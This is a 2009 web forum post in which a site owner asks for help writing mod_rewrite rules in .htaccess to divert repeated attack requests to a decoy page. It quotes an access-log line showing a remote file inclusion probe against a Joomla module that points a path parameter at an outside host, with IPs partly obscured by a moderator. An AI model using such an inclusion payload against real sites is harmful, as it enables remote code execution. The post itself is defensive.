Here is a logfile snippet:

135.196.18n.203 - - [14/Apr/2009:13:06:15 -0400] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://193.111.24n.157/zzzz/(my domain name)/103 HTTP/1.1" 404 325 "-" "-"

The above logfile snippet changes drastically with each attempt, EXCEPT for the 193.111.224.257 IP address, which best I can tell tries to capture the behavior of my server based on the query string they hammer it with.

Since everything else can and does change, blocking by source IP and so forth would be more difficult. So I thought I could use mod_rewrite functionality in my htaccess file in the root of my attacked websites to thwart these pests :)

So, after many, many attempts and lots of head scratching, I came up with this as my "best effort", though according to my logs these pages are still redirected to 193.111.24n.157

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{QUERY_STRING} .*193\.111\.24n\.157.*
RewriteRule .* /jerk.php

I'm confident my understanding of mod_rewrite is not deep enough to really understand what I am doing, so maybe one of you kind folks could give me a few pointers.

In a nutshell, if any request to my web server that contains that specific IP address in the URL (query string), whatever they requested will be ignored and the ./jerk.php file presented in it's place.

Whether the requested page + query string is valid, or not. Is that something I can do with mod_rewrite? Am I getting closer to my goal?

My /var/log/access_log and /var/log/error_log files do not show anything out of the ordinary whether I have the above code in my htaccess or not, thus my being terribly confused.

Advice, pointers, suggestions, and a swift thwack in the side of the head is acceptable and appreciated :)

Regards,

Frederic, regex-clueless.

[edited by: jdMorgan at 7:45 pm (utc) on April 19, 2009]
[edit reason] Obscured specific IP addresses [/edit]